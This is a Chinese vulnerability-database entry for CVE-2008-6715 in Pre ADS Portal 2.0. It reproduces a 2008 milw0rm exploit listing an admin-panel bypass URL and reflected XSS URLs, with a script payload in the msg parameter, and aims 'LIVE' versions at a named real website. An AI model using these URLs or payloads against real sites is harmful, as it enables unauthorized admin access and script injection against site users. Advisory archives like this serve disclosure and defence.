Preprojects Pre ADS Portal多个跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116658 漏洞类型 跨站脚本
发布时间 2008-11-06 更新时间 2009-04-13
CVE编号 CVE-2008-6715 CNNVD-ID CNNVD-200904-249
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/7017
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-249
|漏洞详情
PreADSPortal2.0及之前版本存在多个跨站脚本攻击漏洞。远程攻击者可以借助对(1)homeadmin/adminhome.php和(2)homeadmin/signinform.php的msg参数,注入任意的web脚本或HTML。
|漏洞EXP
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                              IN THE NAME OF ALLAH
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Pre ADS Portal <= 2.0 Multiple Vulnerabilities
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[~] Script:         	Pre ADS Portal
[~] Language :         	PHP
[~] Website[main]:     	http://www.preproject.com
[~] Website[script]:    http://www.preproject.com/ads.asp
[~] Type :             	Commercial
[~] Report-Date :     	05/11/2008
[~] Founder :			G4N0K <mail.ganok[at]gmail.com>

===============================================================================
===[ Admin BYpass ]===
[!] http://localhost/[path]/homeadmin/adminhome.php

===[ Admin BYpass-LIVE ]===
http://www.mideastbiz.com/homeadmin/adminhome.php



===[ XSS ]===
[!] http://localhost/[path]/homeadmin/adminhome.php?pg=1&msg=XSS
[!] http://localhost/[path]/homeadmin/signinform.php?msg=XSS

===[ XSS-LIVE ]===
[!]http://www.mideastbiz.com/homeadmin/adminhome.php?pg=1&msg=g4n0k%22%3E%3Cscript%3Ealert('G4N0K')%3C/script%3E
http://www.mideastbiz.com/homeadmin/signinform.php?msg=g4n0k%22%3E%3Cscript%3Ealert('G4N0K')%3C/script%3E



===[ Greetz ]===
[~] ALLAH
[~] Tornado2800 <Tornado2800[at]gmail.com>
[~] Hussain-X <darkangel_g85[at]yahoo.com>

//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
//ALLAH,forgimme...

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
exit(); //EoX
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2008-11-06]
|参考资料

来源:XF
名称:preadsportal-adminhome-xss(46398)
链接:http://xforce.iss.net/xforce/xfdb/46398
来源:BID
名称:32151
链接:http://www.securityfocus.com/bid/32151
来源:MILW0RM
名称:7017
链接:http://www.milw0rm.com/exploits/7017